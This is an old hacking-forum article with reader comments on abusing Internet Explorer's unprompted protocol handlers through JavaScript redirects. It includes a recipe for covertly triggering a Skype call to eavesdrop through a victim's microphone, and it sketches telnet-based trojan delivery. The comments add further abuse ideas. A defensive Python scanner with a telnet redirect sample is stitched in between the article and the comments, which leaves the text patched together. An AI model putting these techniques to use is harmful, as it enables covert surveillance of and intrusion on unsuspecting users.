IE Xploit
What the IE exploit is, how to use it, how to hide it and what you can do. Examples. Script kiddies beware: this article is engineered only to give enough to be just that, script kiddies; the hardcore stuff you've got to learn yourself.



-=IE Exploit=-

Ok, this exploit isn't exactly the newest in the book, but it's still valid and hasn't been patched (thanks Microsoft). Basically this exploit allows us to remotely run programs on computers via a web page. So let's dig in.

We'll start with a bit of stuff you should know:

Open up IE and in the URL bar type "C:"
Wow, IE just turned into Windows Explorer (sorta).
Isn't that interesting? Well, what if we could run other programs that way... what could we do?
Think about any site you've been to that allows you to open an AIM window to someone. Ever looked at the hyperlink text?
It looks something like this:
aim:goIm?screenname=tikprog&message=hello+world
Okay, let's break that up a bit. We've got 3 parts to this:
aim:
goIm?
screenname=tikprog&message=hello+world

Ok, the "aim" part tells the browser what program to use. Various programs have this:
aim:
yahoo:
irc:
etc.

Next we have goIm? Look like PHP to anyone but me? Yeah... similar. It's the command. AIM has a lot of these:
goIm?
goAway?
and lots of others (google "aim:goIM?" and it should give you a nice list).

And finally, those of you who know PHP will know this already: the last bit is the parameters. That one will send a message to me with "hello world" in it. I'm not going to explain AIM scripting (if you can even call it that; google is your friend, or if you beg maybe I'll write a "scripting for various things" article).

Okay, to the important part here: the "aim:" part. Now, if AIM has this, and as I've said so do Yahoo and IRC, what else may have it? Well, I know for a fact a lot of things do... I'll give some examples later, but first I want you to learn a bit... because that is what being a hacker is about.

The reason this is good for IE and not other browsers (yay for Firefox!) is that IE doesn't prompt you for confirmation that you want to run this script; Firefox prompts you with a nice little box. Now, this becomes a dangerous exploit when you realize that some other programs that are more dangerous than AIM or IRC have this property. Let's say... oh... command, telnet, regedit. Now, for command and regedit I'm only going to show how to access them; using them is much more difficult and I'm not giving that up so a bunch of script kiddies can flood the net with destructive webpages. Those of you who actually figure it out I'm hoping are not going to kill the world. These pages can do A LOT of damage and I in no way advocate them for destruction, but there is a way (that I will show) to use them to gain some nice access and play some fun tricks.

With that being said... let's move on to the next topic. So now you have half a clue what's up with this exploit. If you've been paying attention you may be thinking to yourself "<insert preferred name here>, don't they have to click a hyperlink? Who's dumb enough to do that?"

Thankfully, the Samurai has put 2 and 2 together (and gotten 5... read 1984, seriously) and made a nice little script to do that too. So, I'm not explaining how JavaScript works, just going to show you the code and give a brief explanation... if you don't know JavaScript... GO LEARN DAMNIT. So here's my code:

<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>

So, what does this do? It redirects the page to that URL, which isn't really a URL, just a nice little command. Embed this in a webpage and no one will notice... no change is made... it just runs nicely.

So... now you're thinking "...but Samurai, who cares about putting an AIM message script in?" And again, ye of little faith, I have some fun with this. I'll give you a few nice ones.

For snooping:
There is a nice little messaging program out there, Skype (www.skype.com; I would recommend it. It's encrypted, allows VoIP, has rocking emoticons (type "(finger)" for a hidden one) and just kicks AIM's butt). Most important is VoIP. So, let's say you get your friend (or whoever you want to snoop on). Next go nab the source from a trusted site. I like google. And build a webpage on it (make sure you change the picture source so they show up) and place it in something like GeoCities with the embedded code, and use AIM to hide the link by putting fake text (HTML works nicely too) with the URL.

Skype's command works like this:
skype:
and you put the parameter where the command went and the command where the parameter was... username?call.
So embed this code:

<script>
window.location="skype:username?call";
</script>

And then answer the call. If they have a mic it will turn on and you can listen in.

Now, as promised, the reason for this... intrusion!

Build a similar page and we're using our friend telnet. You're going to need my simple trojan article, or build a socket receiver in VB or whatever you want. Now this only works if you can get a REAL IP address for yourself. If you're behind a router (or they are) it may not work.

So we all know our friend telnet. So your code needs to open telnet to your IP address on the port you want. Telnet has a slightly different protocol to use here (think like command line) and use that in the JavaScript code. I'm not giving you the whole thing... I want YOU to learn and to make sure not everyone does this.

So just think... using command, regedit, *nix you could open ports, run other apps, download trojans. And with a bit of creativity possibly gain some new access.

Enjoy.
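From the defender's side, the pattern the article describes (a page that hands a scheme:command?parameters URI to a local program, with script-driven navigation needing no click) is easy to look for in page source. The checker below is an added example, not code from the article or from HellBound Hackers; the scheme categories, severity labels and the sample HTML are this example's own assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumed categories for the schemes the article mentions (this example's own labelling).
HANDLER_SCHEMES = {"aim": "messaging", "yahoo": "messaging", "irc": "messaging",
                   "skype": "voip", "telnet": "remote-shell"}
WEB_SCHEMES = {"http", "https", "ftp", "mailto"}  # ordinary schemes a page is expected to use

# Script-driven navigation (runs with no click) and plain hyperlinks (need a click).
NAV_RE = re.compile(
    r"""(?:window\.location|document\.location|location\.href)\s*=\s*["']([^"']+)["']""",
    re.IGNORECASE)
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

def parse_handler_uri(uri):
    """Split scheme:path?query into the three parts the article describes.
    Returns None for relative links and ordinary web schemes."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() in WEB_SCHEMES:
        return None
    path, _, query = rest.partition("?")
    return {"scheme": scheme.lower(), "path": path, "query": query,
            "params": parse_qs(query, keep_blank_values=True)}

def find_handler_launches(html):
    """Return one finding per protocol-handler URI the page would hand to a local program."""
    findings = []
    for kind, regex in (("script-navigation", NAV_RE), ("hyperlink", HREF_RE)):
        for uri in regex.findall(html):
            parsed = parse_handler_uri(uri)
            if parsed is None:
                continue
            category = HANDLER_SCHEMES.get(parsed["scheme"], "unknown")
            # No click needed, or a scheme that reaches a shell or is unknown: treat as high.
            high = kind == "script-navigation" or category in ("remote-shell", "unknown")
            findings.append({"kind": kind, "uri": uri, "category": category,
                             "severity": "high" if high else "medium", **parsed})
    return findings

# Constructed sample page: one normal link, one AIM link, two script redirects.
SAMPLE_HTML = """
<a href="http://example.test/page">normal link</a>
<a href="aim:goIm?screenname=tikprog&message=hello+world">chat</a>
<script>window.location="skype:username?call";</script>
<script>window.location="telnet://listener.example:23";</script>
"""

if __name__ == "__main__":
    for f in find_handler_launches(SAMPLE_HTML):
        print(f"{f['severity']:6} {f['kind']:17} {f['scheme']}: {f['uri']}")
```

The regexes only catch literal string assignments; a page that builds the URI at runtime needs the rendered DOM or a browser policy that disables unregistered or unwanted handlers rather than source scanning.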


Comments

hackerboy666 on October 03 2006 - 17:08:30
thats 1 of the best articles ive read in quite some time. interesting and helpful. good job!
only_samurai on October 03 2006 - 17:11:22
thanks mate. rate it high if you like it. pm me if ya'll have any questions or anything. im glad to help
BluMoose on October 03 2006 - 19:01:36
Very nice article :) Making a .swf to execute the code could lead to a lot of entertainment as well (imagine people's PCs shutting down every time they opened your MySpace page...)
chislam on October 03 2006 - 22:28:40
nice article man
Arto_8000 on October 04 2006 - 02:26:07
Actually I dunno why you call this type of exploit IE only; some protocols such as "irc" don't ask you before they execute, but for xml: it asks you first. It only depends on what protocol you're using.
only_samurai on October 04 2006 - 04:01:47
The IE-only part means that FF and such don't have it. They still allow these things but they prompt a question first, so you can't use it as hidden.
SwiftNomad on October 06 2006 - 20:03:45
I liked this one. Im going to dig more into this. Good job!
korg on October 07 2006 - 02:36:32
Great article for new people but this has been well known for a while and skype well for us elders LOL. Still good though 6/10
only_samurai on October 24 2006 - 17:28:23
kiyoura what more do you want? want me to spell out how to take out files, edit the registry, send emails via this so all you skiddies can just jump on and "hack the planet?" This is saying what can be done and giving some examples. I'm not going to write code out that will just tell you what to do. GO LEARN SOMETHING.
TWS_Sentinel on January 11 2007 - 06:48:17
A very nice article but one question... say you're able to execute the "telnet://" and open a connection to your tcpListener or some kind of socket listener. Use a streamWriter to upload data/trojan/whatever... you still can then execute the package remotely. Or can you? Maybe I'm missing something?
TWS_Sentinel on January 11 2007 - 06:49:15
sorry, the above should be corrected: you still can't then execute
only_samurai on February 19 2007 - 21:54:02
I don't think you can remotely execute it, unless you can use the IE exploit to do that. So have your connection software be automated and have the page that does the telnet redirect automatically after like 10 seconds to the page that calls "program://" or w/e... that might work.
revolt0163 on March 08 2007 - 01:27:23
say you put aim://bladhvadhfKS in a frames tag, and they didn't have aim, would it give an error msg?
Der Heiligen on March 11 2007 - 16:42:28
Very good article samurai, I'm definitely digging deeper into this too :D. And I'm glad you didn't just spoon feed skiddies how to do it. Very good job :p.
R3l3ntl3ss on April 22 2007 - 21:53:49
Great thank you! :p Really good! And great it stops skiddies! :)
Damnation on June 18 2007 - 06:39:39
Wow, thanks samurai! :D I have so many new, fun ideas! I'm guessing script kiddies rated this poor. :o
© HellBound Hackers 2008- 2009. Since 3rd December 2004.